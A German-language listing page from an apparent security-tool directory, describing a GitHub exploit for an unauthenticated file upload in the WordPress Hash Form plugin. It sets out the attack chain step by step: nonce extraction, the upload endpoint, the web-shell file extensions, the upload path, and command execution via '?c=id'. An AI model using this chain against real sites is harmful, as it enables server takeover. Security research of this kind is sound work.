Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-81780-Hash-Form — Exploit für CVE-2026-81780: nicht authentifizierter Datei-Upload im WordPress-Hash-Form-Plugin, der über manipulierte PHP-Payloads zu Remote-Code-Ausführung führt. | Kitploit
Tools/GitHubGitHub/0xterror/cve-2026-81780-hash-form
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHub0xterror/cve-2026-81780-hash-form

CVE-2026-81780-Hash-Form

Exploit für CVE-2026-81780: nicht authentifizierter Datei-Upload im WordPress-Hash-Form-Plugin, der über manipulierte PHP-Payloads zu Remote-Code-Ausführung führt.

Repository anzeigen
vor 15h 30mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-81780-Hash-Form

CVE-2026-81780 — Hash Form RCE

Die Schwachstelle

Unsichere Datei-Uploads im WordPress-Plugin Hash Form (≤ 1.4.2). Das Plugin erlaubt beliebige Datei-Uploads ohne ordnungsgemäße Authentifizierung oder Dateityp-Validierung, was zu Remote Code Execution (RCE) führt.


Exploit-Kette

Schritt Aktion 1 Angreifer prüft das Hash-Form-Plugin über readme.txt 2 Extrahiert ajax_nounce durch Vorschau der Formulare (hashform_preview) 3 Sendet POST-Anfrage an hashform_file_upload_action mit PHP-Payload 4 Lädt Web-Shell als .phar, .phtml, .php5 oder .php7 hoch 5 Löst die Shell aus, indem /wp-content/uploads/hashform/temp/v.{ext} aufgerufen wird 6 Führt Systembefehle über ?c=id aus

root@kitploit:~

GET /wp-content/plugins/hash-form/readme.txt
    ↓
Version Detected (≤ 1.4.2)
    ↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
    ↓
Extract Nonce: ajax_nounce=...
    ↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
    ↓
Upload: v.phar (or .phtml, .php5, .php7)
    ↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
    ↓
Command Executed (uid=www-data)```
Tool herunterladen